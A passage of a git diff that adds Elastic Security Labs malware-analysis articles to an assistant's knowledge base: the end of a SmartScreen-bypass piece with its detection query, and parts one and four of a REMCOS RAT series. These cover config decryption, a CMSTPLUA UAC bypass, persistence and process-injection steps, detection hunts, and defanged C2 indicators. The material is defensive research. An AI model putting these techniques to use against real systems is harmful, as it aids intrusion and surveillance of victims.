+and process.hash.sha256 is not null
+| eval process.name = replace(process.name, " \\(1\\).", ".")
+| stats hosts = count_distinct(agent.id) by process.name, process.hash.sha256
+| where hosts == 1
+```
+
+LNK stomping may have many variants, making signature-based detection on LNK files difficult. However, they should all trigger a similar behavioral signal- ```explorer.exe``` overwriting an LNK file. This is especially anomalous in the downloads folder or when the LNK has the Mark of the Web.
+
+```
+file where event.action == "overwrite" and file.extension : "lnk" and
+ process.name : "explorer.exe" and process.thread.Ext.call_stack_summary : "ntdll.dll|*|windows.storage.dll|shell32.dll|*" and
+ (
+  file.path : ("?:\\Users\\*\\Downloads\\*.lnk", "?:\\Users\\*\\AppData\\Local\\Temp\\*.lnk") or
+  file.Ext.windows.zone_identifier == 3
+  )
+```
+
+Finally, robust behavioral coverage around common attacker techniques such as in-memory evasion, persistence, credential access, enumeration, and lateral movement helps detect realistic intrusions, including from reputation hijacking. 
+
+## Conclusion
+
+Reputation-based protection systems are a powerful layer for blocking commodity malware. However, like any protection technique, they have weaknesses that can be bypassed with some care. Smart App Control and SmartScreen have a number of fundamental design weaknesses that can allow for initial access with no security warnings and minimal user interaction. Security teams should scrutinize downloads carefully in their detection stack and not rely solely on OS-native security features for protection in this area.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_four.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_four.md
new file mode 100644
index 0000000000000..1171e381b801d
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_four.md
@@ -0,0 +1,265 @@
+---
+title: "Dissecting REMCOS RAT: An in-depth analysis of a widespread 2024 malware, Part Four"
+slug: "dissecting-remcos-rat-part-four"
+date: "2024-05-10"
+subtitle: "Part four: Detections, hunts using ES|QL, and conclusion"
+description: "In previous articles in this multipart series, malware researchers on the Elastic Security Labs team decomposed the REMCOS configuration structure and gave details about its C2 commands. In this final part, you’ll learn more about detecting and hunting REMCOS using Elastic technologies."
+author:
+  - slug: cyril-francois
+  - slug: samir-bousseaden
+image: "Security Labs Images 18.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - malware-analysis
+  - remcos
+---
+
+# Detections, hunts using ES|QL, and conclusion
+
+In previous articles in this multipart series [[1](https://www.elastic.co/security-labs/dissecting-remcos-rat-part-one)] [[2](https://www.elastic.co/security-labs/dissecting-remcos-rat-part-two)] [[3](https://www.elastic.co/security-labs/dissecting-remcos-rat-part-three)], malware researchers on the Elastic Security Labs team decomposed the REMCOS configuration structure and gave details about its C2 commands. In this final part, you’ll learn more about detecting and hunting REMCOS using Elastic technologies.
+
+## Detection and Hunt
+
+The following [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) detections trigger on those techniques:
+
+**Persistence (Run key)**  
+* [Startup Persistence by a Low Reputation Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/persistence_startup_persistence_by_a_low_reputation_process.toml)  
+
+**Process Injection**  
+* [Windows.Trojan.Remcos](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Remcos.yar), [shellcode_thread](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#memory-protection) (triggers multiple times on both watchdog and main REMCOS injected processes)
+* [Potential Masquerading as SVCHOST](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_svchost.toml) (REMCOS watchdog default to an injected svchost.exe child instance)
+* [Remote Process Injection via Mapping](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_remote_process_injection_via_mapping.toml) (triggers on both watchdog and injecting C:\Program Files (x86)\Internet Explorer\iexplore.exe)  
+
+**Privilege Escalation (UAC Bypass)**  
+* [UAC Bypass via ICMLuaUtil Elevated COM Interface](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/privilege_escalation_uac_bypass_via_icmluautil_elevated_com_interface.toml)
+
+**Evasion (Disable UAC)**  
+* [Disabling User Account Control via Registry Modification](https://github.com/elastic/detection-rules/blob/main/rules/windows/privilege_escalation_disable_uac_registry.toml) (REMCOS spawns cmd.exe that uses reg.exe to disable UAC via registry modification)
+
+**Command and Control**  
+* [Connection to Dynamic DNS Provider by an Unsigned Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_dynamic_dns_provider_by_an_unsigned_binary.toml) (although it’s not a requirement but most of the observed samples use dynamic DNS)
+
+**File Deletion**  
+* [Remcos RAT INETCookies File Deletion](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/command_and_control_remcos_rat_inetcookies_file_deletion.toml)
+
+**Modify Registry**  
+* [Remcos RAT ExePath Registry Modification](https://github.com/elastic/protections-artifacts/blob/72bede645f2fbb34cf3882fa2758c896a0073c6b/behavior/rules/command_and_control_remcos_rat_exepath_registry_modification.toml)
+
+The ExePath registry value used by the REMCOS watchdog process can be used as an indicator of compromise. Below is a KQL query example :
+
+```
+event.category:"registry" and event.action:"modification" and 
+registry.value:"EXEpath" and not process.code_signature.trusted:true
+```
+
+![](/assets/images/dissecting-remcos-rat-part-four/image1.png "image_tooltip")
+
+REMCOS includes three options for clearing browser data, possibly in an attempt to force victim users to re-enter their web credentials for keylogging:
+
+* `enable_browser_cleaning_on_startup_flag`
+* `enable_browser_cleaning_only_for_the_first_run_flag`
+* `browser_cleaning_sleep_time_in_minutes`
+
+This results in the deletion of browser cookies and history-related files. The following KQL query can be used to hunt for such behavior by an unsigned process:
+
+```
+event.category:file and event.action:deletion and file.name:container.dat and 
+file.path:*INetCookies* and not process.code_signature.trusted:true
+```
+
+![](/assets/images/dissecting-remcos-rat-part-four/image3.png "image_tooltip")
+
+REMCOS also employs three main information collection methods. The first one is keylogging via [SetWindowsHookEx](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexa) API. The following [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-language.html) can be used to hunt for rare or unusual processes performing this behavior: 
+
+```
+from logs-endpoint.events.api*
+
+/* keylogging can be done by calling SetwindowsHook to hook keyboard events */
+
+| where event.category == "api" and process.Ext.api.name == "SetWindowsHookEx" and process.Ext.api.parameters.hook_type like "WH_KEYBOARD*"
+
+/* normalize process paths to ease aggregation by process path */
+
+| eval process_path = replace(process.executable, """([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}|ns[a-z][A-Z0-9]{3,4}\.tmp|DX[A-Z0-9]{3,4}\.tmp|7z[A-Z0-9]{3,5}\.tmp|[0-9\.\-\_]{3,})""", "")
+| eval process_path = replace(process_path, """[cC]:\\[uU][sS][eE][rR][sS]\\[a-zA-Z0-9\.\-\_\$~]+\\""", "C:\\\\users\\\\user\\\\")
+
+/* limit results to those that are unique to a host across the agents fleet */
+
+| stats occurrences = count(*), agents = count_distinct(host.id) by process_path
+| where occurrences == 1 and agents == 1
+```
+
+Below is an example of matches on `iexplore.exe` (injected by REMCOS): 
+
+![ES|QL hunt for rare processes calling SetWindowsHoook to hook keyboard events](/assets/images/dissecting-remcos-rat-part-four/image5.png "ES|QL hunt for rare processes calling SetWindowsHoook to hook keyboard events")
+
+
+The second method takes multiple screenshots and saves them as jpg files with a specific naming pattern starting with `time_year-month-day_hour-min-sec.jpb` (e.g. `time_20240308_171037.jpg`). The following [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-language.html) hunt can be used to identify suspicious processes with similar behavior :
+
+```
+from logs-endpoint.events.file*
+
+/* remcos screenshots naming pattern */
+
+| where event.category == "file" and host.os.family == "windows" and event.action == "creation" and file.extension == "jpg" and file.name rlike """time_202\d{5}_\d{6}.jpg"""
+| stats occurrences = count(*), agents = count_distinct(host.id) by process.name, process.entity_id 
+ 
+ /* number of screenshots i more than 5 by same process.pid and this behavior is limited to a unique host/process */
+
+| where occurrences >= 5 and agents == 1
+```
+
+The following image shows both REMCOS and the injected iexplore.exe instance (further investigation can be done by pivoting by the [process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id)): 
+
+![ES|QL hunt for rare processes creating JPG files similar to REMCOS behavior](/assets/images/dissecting-remcos-rat-part-four/image6.png "ES|QL hunt for rare processes creating JPG files similar to REMCOS behavior")
+
+
+The third collection method is an audio recording saved as WAV files. The following [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-language.html) hunt can be used to find rare processes dropping WAV files:
+
+```
+from logs-endpoint.events.file*
+| where event.category == "file" and host.os.family == "windows" and event.action == "creation" and file.extension == "wav"
+
+/* normalize process paths to ease aggregation by process path */
+
+| eval process_path = replace(process.executable, """([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}|ns[a-z][A-Z0-9]{3,4}\.tmp|DX[A-Z0-9]{3,4}\.tmp|7z[A-Z0-9]{3,5}\.tmp|[0-9\.\-\_]{3,})""", "")
+| eval process_path = replace(process_path, """[cC]:\\[uU][sS][eE][rR][sS]\\[a-zA-Z0-9\.\-\_\$~]+\\""", "C:\\\\users\\\\user\\\\")
+| stats wav_files_count = count(*), agents = count_distinct(host.id) by process_path
+
+/* limit results to unique process observed in 1 agent and number of dropped wav files is less than 20 */
+
+| where agents == 1 and wav_files_count <= 10
+```
+
+![ES|QL hunt for rare processes creating WAV files](/assets/images/dissecting-remcos-rat-part-four/image2.png "ES|QL hunt for rare processes creating WAV files")
+
+
+The following [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-language.html) hunt can also look for processes that drop both JPG and WAV files using the same `process.pid` : 
+
+```
+from logs-endpoint.events.file*
+| where event.category == "file" and host.os.family == "windows" and event.action == "creation" and file.extension in ("wav", "jpg") and 
+
+/* excluding privileged processes and limiting the hunt to unsigned 
+process or signed by untrusted certificate or signed by Microsoft */
+
+not user.id in ("S-1-5-18", "S-1-5-19", "S-1-5-20") and (process.code_signature.trusted == false or process.code_signature.exists == false or starts_with(process.code_signature.subject_name, "Microsoft")) 
+| eval wav_pids = case(file.extension == "wav", process.entity_id, null), jpg_pids = case(file.extension == "jpg", process.entity_id, null), others = case(file.extension != "wav" and file.extension != "jpg", process.entity_id, null)
+
+/* number of jpg and wav files created by unique process identifier */
+
+| stats count_wav_files = count(wav_pids), count_jpg_files = count(jpg_pids), other_files = count(others) by process.entity_id, process.name
+
+/* limit results to same process dropping both file extensions */
+
+| where count_jpg_files >= 1 and count_wav_files >= 1
+```
+
+Examples of matches on both REMCOS and the injected `iexplore.exe` process:
+
+![ES|QL hunts for unique processes dropping image and audio files](/assets/images/dissecting-remcos-rat-part-four/image4.png "ES|QL hunts for unique processes dropping image and audio files")
+
+
+Pivoting by [process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id) to further investigate suspicious processes, installers, browsers, and decompression utilities are often the most observed false positives.
+
+## YARA rule
+
+The REMCOS version 4.9.3 is detected statically using the following [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Remcos.yar) produced by Elastic Security Labs
+
+## Malware and MITRE ATT&CK
+
+Elastic uses the[ MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the _why_ of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+* [Execution](https://attack.mitre.org/tactics/TA0002/)
+* [Persistence](https://attack.mitre.org/tactics/TA0003)
+* [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)
+* [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)
+* [Credential Access](https://attack.mitre.org/tactics/TA0006)
+* [Discovery](https://attack.mitre.org/tactics/TA0007)
+* [Command and Control](https://attack.mitre.org/tactics/TA0011)
+
+### Techniques
+
+Techniques represent how an adversary achieves a tactical goal by performing an action.
+
+* [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)
+* [Visual Basic](https://attack.mitre.org/techniques/T1059/005) 
+* [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)
+* [Process Injection](https://attack.mitre.org/techniques/T1055) 
+* [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003) 
+* [Encrypted Channel](https://attack.mitre.org/techniques/T1573)
+* [System Binary Proxy Execution: CMSTP](https://attack.mitre.org/techniques/T1218/003/)
+* [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002/)
+
+## Conclusion
+
+As the REMCOS continues to rapidly evolve, our in-depth analysis of version 4.9.3 offers critical insights that can significantly aid the malware research community in comprehending and combatting this pervasive threat.
+
+By uncovering its features and capabilities in this series, we provide essential information that enhances understanding and strengthens defenses against this malicious software. 
+
+We've also shown that our Elastic Defend product can detect and stop the REMCOS threat. As this article demonstrates, our new query language, ES|QL, makes hunting for threats simple and effective.
+
+Elastic Security Labs remains committed to this endeavor as part of our open-source philosophy, which is dedicated to sharing knowledge and collaborating with the broader cybersecurity community. Moving forward, we will persist in analyzing similar malware families, contributing valuable insights to bolster collective defense against emerging cyber threats.
+
+## Sample hashes and C2s
+
+(Analysis reference) **0af76f2897158bf752b5ee258053215a6de198e8910458c02282c2d4d284add5**
+
+remchukwugixiemu4.duckdns[.]org:57844
+
+remchukwugixiemu4.duckdns[.]org:57846
+
+remchukwugix231fgh.duckdns[.]org:57844
+
+remchukwugix231fgh.duckdns[.]org:57846
+
+**3e32447ea3b5f07c7f6a180269f5443378acb32c5d0e0bf01a5e39264f691587**
+
+122.176.133[.]66:2404
+
+122.176.133[.]66:2667
+
+**8c9202885700b55d73f2a76fbf96c1b8590d28b061efbadf9826cdd0e51b9f26**
+
+43.230.202[.]33:7056
+
+**95dfdb588c7018babd55642c48f6bed1c281cecccbd522dd40b8bea663686f30**
+
+107.175.229[.]139:8087
+
+**517f65402d3cf185037b858a5cfe274ca30090550caa39e7a3b75be24e18e179**
+
+money001.duckdns[.]org:9596
+
+**b1a149e11e9c85dd70056d62b98b369f0776e11b1983aed28c78c7d5189cfdbf**
+
+104.250.180[.]178:7902
+
+**ba6ee802d60277f655b3c8d0215a2abd73d901a34e3c97741bc377199e3a8670**
+
+185.70.104[.]90:2404
+
+185.70.104[.]90:8080
+
+185.70.104[.]90:465
+
+185.70.104[.]90:80
+
+77.105.132[.]70:80
+
+77.105.132[.]70:8080
+
+77.105.132[.]70:2404
+
+77.105.132[.]70:465
+
+## Research references
+
+* [https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing](https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing)
+* [https://www.jaiminton.com/reverse-engineering/remcos](https://www.jaiminton.com/reverse-engineering/remcos)
+* [https://breakingsecurity.net/wp-content/uploads/dlm_uploads/2018/07/Remcos_Instructions_Manual_rev22.pdf](https://breakingsecurity.net/wp-content/uploads/dlm_uploads/2018/07/Remcos_Instructions_Manual_rev22.pdf)
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_one.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_one.md
new file mode 100644
index 0000000000000..0ed84ffbad57f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_one.md
@@ -0,0 +1,311 @@
+---
+title: "Dissecting REMCOS RAT: An in-depth analysis of a widespread 2024 malware, Part One"
+slug: "dissecting-remcos-rat-part-one"
+date: "2024-04-24"
+subtitle: "Part one: Introduction to REMCOS and diving into its initialization procedure"
+description: "This malware research article describes the REMCOS implant at a high level, and provides background for future articles in this multipart series."
+author:
+  - slug: cyril-francois
+  - slug: samir-bousseaden
+image: "Security Labs Images 36.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - malware-analysis
+  - remcos
+---
+
+In the first article in this multipart series, malware researchers on the Elastic Security Labs team give a short introduction about the REMCOS threat and dive into the first half of its execution flow, from loading its configuration to cleaning the infected machine web browsers.
+
+## Introduction
+
+Elastic Security Labs continues its examination of high-impact threats, focusing on the internal complexities of REMCOS version 4.9.3 Pro (November 26, 2023).
+
+Developed by [Breaking-Security](https://breakingsecurity.net/), REMCOS is a piece of software that began life as a red teaming tool but has since been adopted by threats of all kinds targeting practically every sector.
+
+When we performed our analysis in mid-January, it was the most prevalent malware family [reported by ANY.RUN](https://any.run/malware-trends/). Furthermore, it remains under active development, as evidenced by the [recent announcement](https://breakingsecurity.net/remcos/changelog/) of version 4.9.4's release by the company on March 9, 2024.
+
+All the samples we analyzed were derived from the same REMCOS 4.9.3 Pro x86 build. The software is coded in C++ with intensive use of the `std::string` class for its string and byte-related operations.
+
+REMCOS is packed with a wide range of functionality, including evasion techniques, privilege escalation, process injection, recording capabilities, etc.
+
+This article series provides an extensive analysis of the following:
+ - Execution and capabilities
+ - Detection and hunting strategies using Elastic’s ES|QL queries
+ - Recovery of approximately 80% of its configuration fields
+ - Recovery of about 90% of its C2 commands
+ - Sample virtual addresses under each IDA Pro screenshot
+ - And more!
+ 
+![REMCOS execution diagram](/assets/images/dissecting-remcos-rat-part-one/image77.png)
+
+
+For any questions or feedback, feel free to reach out to us on social media [@elasticseclabs](https://twitter.com/elasticseclabs) or in the Elastic [Community Slack](https://elasticstack.slack.com).
+
+### Loading the configuration
+
+The REMCOS configuration is stored in an encrypted blob within a resource named ```SETTINGS```. This name appears consistent across different versions of REMCOS.
+
+![REMCOS config stored in encrypted SETTINGS resource](/assets/images/dissecting-remcos-rat-part-one/image29.png)
+
+
+The malware begins by loading the encrypted configuration blob from its resource section.
+
+![0x41B4A8 REMCOS loads its encrypted configuration from resources](/assets/images/dissecting-remcos-rat-part-one/image40.png)
+
+
+To load the encrypted configuration, we use the following Python script and the [Lief](https://pypi.org/project/lief/) module.
+
+```
+import lief
+
+def read_encrypted_configuration(path: pathlib.Path) -> bytes | None:
+	if not (pe := lief.parse(path)):
+    		return None
+
+	for first_level_child in pe.resources.childs:
+    		if first_level_child.id != 10:
+        		continue
+
+    	for second_level_child in first_level_child.childs:
+        		if second_level_child.name == "SETTINGS":
+            			return bytes(second_level_child.childs[0].content)
+```
+
+We can confirm that version 4.9.3 maintains the same structure and decryption scheme as previously described by [Fortinet researchers](https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing):
+
+![Fortinet reported structure and decryption scheme](/assets/images/dissecting-remcos-rat-part-one/image55.png)
+
+
+We refer to the “encrypted configuration” as the structure that contains the decryption key and the encrypted data blob, which appears as follows:
+
+```
+struct ctf::EncryptedConfiguration
+{
+uint8_t key_size;
+uint8_t key[key_size];
+uint8_t data
+};
+```
+
+The configuration is still decrypted using the RC4 algorithm, as seen in the following screenshot.
+
+![0x40F3C3 REMCOS decrypts its configuration using RC4](/assets/images/dissecting-remcos-rat-part-one/image53.png)
+
+
+To decrypt the configuration, we employ the following algorithm.
+
+```
+def decrypt_encrypted_configuration(
+	encrypted_configuration: bytes,
+) -> tuple[bytes, bytes]:
+	key_size = int.from_bytes(encrypted_configuration[:1], "little")
+	key = encrypted_configuration[1 : 1 + key_size]
+	return key, ARC4.ARC4Cipher(key).decrypt(encrypted_configuration[key_size + 1 :])
+```
+
+The configuration is used to initialize a global vector that we call ```g_configuration_vector``` by splitting it with the string ```\x7c\x1f\x1e\x1e\x7c``` as a delimiter.
+
+![0x40EA16 Configuration string is split to initialize g_configuration_vector](/assets/images/dissecting-remcos-rat-part-one/image48.png)
+
+
+We provide a detailed explanation of the configuration later in this series.
+
+### UAC Bypass
+
+When the ```enable_uac_bypass_flag``` (index ```0x2e```) is enabled in the configuration, REMCOS attempts a UAC bypass using a known COM-based technique.
+
+![0x40EC4C Calling the UAC Bypass feature when enabled in the configuration](/assets/images/dissecting-remcos-rat-part-one/image27.png)
+
+
+Beforehand, the REMCOS masquerades its process in an effort to avoid detection.
+
+![0x40766D UAC Bypass is wrapped between process masquerading and un-masquerading](/assets/images/dissecting-remcos-rat-part-one/image78.png)
+
+
+REMCOS modifies the PEB structure of the current process by replacing the image path and command line with the ```explorer.exe``` string while saving the original information in global variables for later use.
+
+![0x40742E Process PEB image path and command line set to explorer.exe](/assets/images/dissecting-remcos-rat-part-one/image14.png)
+
+
+The well-known [technique](https://attack.mitre.org/techniques/T1218/003/) exploits the ```CoGetObject``` API to pass the ```Elevation:Administrator!new:``` moniker, along with the ```CMSTPLUA``` CLSID and ```ICMLuaUtil``` IID, to instantiate an elevated COM interface. REMCOS then uses the ```ShellExec()``` method of the interface to launch a new process with administrator privileges, and exit.
+
+![0x407607 calling ShellExec from an elevated COM interface](/assets/images/dissecting-remcos-rat-part-one/image85.png)
+
+
+![0x4074FD instantiating an elevated COM interface](/assets/images/dissecting-remcos-rat-part-one/image9.png)
+
+
+This technique was previously documented in an Elastic Security Labs article from 2023: [Exploring Windows UAC Bypasses: Techniques and Detection Strategies](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies).
+
+Below is a recent screenshot of the detection of this exploit using the Elastic Defend agent.
+
+![UAC bypass exploit detection by the Elastic Defend agent disabling UAC](/assets/images/dissecting-remcos-rat-part-one/image25.png)
+
+
+### Disabling UAC
+
+When the ```disable_uac_flag``` is enabled in the configuration (index ```0x27```), REMCOS [disables UAC](https://attack.mitre.org/techniques/T1548/002/) in the registry by setting the ```HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA``` value to ```0``` using the ```reg.exe``` Windows binary."
+
+![](/assets/images/dissecting-remcos-rat-part-one/image4.png)
+
+
+![](/assets/images/dissecting-remcos-rat-part-one/image12.png)
+
+
+## Install and persistence
+
+When ```enable_install_flag``` (index ```0x3```) is activated in the configuration, REMCOS will install itself on the host machine.
+
+![0x40ED8A Calling install feature when the flag is enabled in configuration](/assets/images/dissecting-remcos-rat-part-one/image50.png)
+
+
+The installation path is constructed using the following configuration values:
+ - ```install_parent_directory``` (index ```0x9```)
+ - ```install_directory``` (```0x30```)
+ - ```install_filename``` (```0xA```)
+
+The malware binary is copied to ```{install_parent_directory}/{install_directory}/{install_filename}```. In this example, it is ```%ProgramData%\Remcos\remcos.exe```.
+
+![Sample detected in its installation directory](/assets/images/dissecting-remcos-rat-part-one/image42.png)
+
+
+If the ```enable_persistence_directory_and_binary_hiding_flag``` (index ```0xC```) is enabled in the configuration, the install folder and the malware binary are set to super hidden (even if the user enables showing hidden files or folders the file is kept hidden by Windows to protect files with system attributes) and read-only by applying read-only, hidden, and system attributes to them.
+
+![0x40CFC3 REMCOS applies read-only and super hidden attributes to its install folder and files](/assets/images/dissecting-remcos-rat-part-one/image83.png)
+
+
+![Install files set as read-only and super hidden](/assets/images/dissecting-remcos-rat-part-one/image60.png)
+
+
+After installation, REMCOS establishes persistence in the registry depending on which of the following flags are enabled in the configuration:
+ - ```enable_hkcu_run_persistence_flag``` (index ```0x4```)
+```HKCU\Software\Microsoft\Windows\CurrentVersion\Run\```
+ - ```enable_hklm_run_persistence_flag``` (index ```0x5```)
+```HKLM\Software\Microsoft\Windows\CurrentVersion\Run\```
+ - ```enable_hklm_policies_explorer_run_flag``` (index ```0x8```)
+```HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\```
+
+![0x40CD0D REMCOS establishing persistence registry keys](/assets/images/dissecting-remcos-rat-part-one/image47.png)
+
+
+The malware is then relaunched from the installation folder using ```ShellExecuteW```, followed by termination of the initial process.
+
+![0x40D04B Relaunch of the REMCOS process after installation](/assets/images/dissecting-remcos-rat-part-one/image75.png)
+
+
+## Process injection
+
+When the ```enable_process_injection_flag``` (index ```0xD```) is enabled in the configuration,  REMCOS injects itself into either a specified or a Windows process chosen from an hardcoded list to evade detection.
+
+![0x40EEB3 Calling process injection feature if enabled in the configuration](/assets/images/dissecting-remcos-rat-part-one/image15.png)
+
+
+![REMCOS running injected into iexplore.exe](/assets/images/dissecting-remcos-rat-part-one/image21.png)
+
+
+The ```enable_process_injection_flag``` can be either a boolean or the name of a target process. When set to true (1), the injected process is chosen in a “best effort” manner from the following options:
+ - ```iexplorer.exe```
+ - ```ieinstal.exe```
+ - ```ielowutil.exe```
+
+![](/assets/images/dissecting-remcos-rat-part-one/image73.png)
+
+
+*Note: there is only one injection method available in REMCOS, when we talk about process injection we are specifically referring to the method outlined here*
+
+REMCOS uses a classic ```ZwMapViewOfSection``` + ```SetThreadContext``` + ```ResumeThread``` technique for process injection. This involves copying itself into the injected binary via shared memory, mapped using ```ZwMapViewOfSection``` and then hijacking its execution flow to the REMCOS entry point using ```SetThreadContext``` and ```ResumeThread``` methods.
+
+It starts by creating the target process in suspended mode using the ```CreateProcessW``` API and retrieving its thread context using the ```GetThreadContext``` API.
+
+![0x418217 Creation of target process suspended mode](/assets/images/dissecting-remcos-rat-part-one/image97.png)
+
+
+Then, it creates a shared memory using the ```ZwCreateSection``` API and maps it into the target process using the ```ZwMapViewOfSection``` API, along with the handle to the remote process.
+
+![0x418293 Creating of the shared memory](/assets/images/dissecting-remcos-rat-part-one/image66.png)
+
+
+![0x41834C Mapping of the shared memory in the target process](/assets/images/dissecting-remcos-rat-part-one/image43.png)
+
+
+The binary is next loaded into the remote process by copying its header and sections into shared memory.
+
+![0x41836F Mapping the PE in the shared memory using ```memmove```](/assets/images/dissecting-remcos-rat-part-one/image90.png)
+
+
+Relocations are applied if necessary. Then, the PEB ```ImageBaseAddress``` is fixed using the ```WriteProcessMemory``` API. Subsequently, the thread context is set with a new entry point pointing to the REMCOS entry point, and process execution resumes.
+
+![0x41840B Hijacking process entry point to REMCOS entry point and resuming the process](/assets/images/dissecting-remcos-rat-part-one/image34.png)
+
+
+Below is the detection of this process injection technique by our agent:
+
+![Process injection alert](/assets/images/dissecting-remcos-rat-part-one/image54.png)
+
+
+![Process injection process tree](/assets/images/dissecting-remcos-rat-part-one/image59.png)
+
+
+## Setting up logging mode
+
+REMCOS has three logging mode values that can be selected with the ```logging_mode``` (index ```0x28```) field of the configuration:
+ - 0: No logging 
+ - 1: Start minimized in tray icon 
+ - 2: Console logging
+
+![0x40EFA3 Logging mode configured from settings](/assets/images/dissecting-remcos-rat-part-one/image39.png)
+
+
+Setting this field to 2 enables the console, even when process injection is enabled, and exposes additional information.
+
+![REMCOS console displayed while injected into iexplore.exe](/assets/images/dissecting-remcos-rat-part-one/image71.png)
+
+
+## Cleaning browsers
+
+When the ```enable_browser_cleaning_on_startup_flag``` (index ```0x2B```) is enabled,  REMCOS will delete cookies and login information from the installed web browsers on the host. 
+
+![0x40F1CC Calling browser cleaning feature when enabled in the configuration](/assets/images/dissecting-remcos-rat-part-one/image5.png)
+
+
+According to the [official documentation](https://breakingsecurity.net/wp-content/uploads/dlm_uploads/2018/07/Remcos_Instructions_Manual_rev22.pdf) the goal of this capability is to increase the system security against password theft:
+
+![](/assets/images/dissecting-remcos-rat-part-one/image76.png)
+
+
+Currently, the supported browsers are Internet Explorer, Firefox, and Chrome.
+
+![0x40C00C Supported browsers for cleaning features](/assets/images/dissecting-remcos-rat-part-one/image7.png)
+
+
+The cleaning process involves deleting cookies and login files from browsers' known directory paths using the ```FindFirstFileA```, ```FindNextFileA```, and ```DeleteFileA``` APIs:
+
+![0x40BD37 Cleaning Firefox cookies 1/2](/assets/images/dissecting-remcos-rat-part-one/image56.png)
+
+
+![0x40BD37 Cleaning Firefox cookies 2/2](/assets/images/dissecting-remcos-rat-part-one/image74.png)
+
+
+When the job is completed, REMCOS prints a message to the console.
+
+![REMCOS printing success message after cleaning browsers](/assets/images/dissecting-remcos-rat-part-one/image96.png)
+
+
+It's worth mentioning two related fields in the configuration:
+ - ```enable_browser_cleaning_only_for_the_first_run_flag``` (index ```0x2C```)
+ - ```browser_cleaning_sleep_time_in_minutes``` (index ```0x2D```)
+
+The ```browser_cleaning_sleep_time_in_minutes``` configuration value determines how much time REMCOS will sleep before performing the job.
+
+![0x40C162 Sleeping before performing browser cleaning job](/assets/images/dissecting-remcos-rat-part-one/image13.png)
+
+
+When ```enable_browser_cleaning_only_for_the_first_run_flag``` is enabled, the cleaning will occur only at the first run of REMCOS. Afterward, the ```HKCU/SOFTWARE/{mutex}/FR``` registry value is set.
+
+On subsequent runs, the function directly returns if the value exists and is set in the registry.
+
+![](/assets/images/dissecting-remcos-rat-part-one/image67.png)
+
+
+That’s the end of the first article. The second part will cover the second half of REMCOS' execution flow, starting from its watchdog to the first communication with its C2.
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_three.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_three.md
new file mode 100644
index 0000000000000..91b4393f5c9f7
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_three.md
@@ -0,0 +1,367 @@
+---
+title: "Dissecting REMCOS RAT: An in-depth analysis of a widespread 2024 malware, Part Three"
+slug: "dissecting-remcos-rat-part-three"
+date: "2024-05-03"
+subtitle: "Part three: Configuration and commands"
+description: "In previous articles in this multipart series, malware researchers on the Elastic Security Labs team dove into the REMCOS execution flow. In this article, you’ll learn more about REMCOS configuration structure and its C2 commands."
+author:
+  - slug: cyril-francois
+  - slug: samir-bousseaden
+image: "Security Labs Images 14.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - malware-analysis
+  - remcos
+---
+
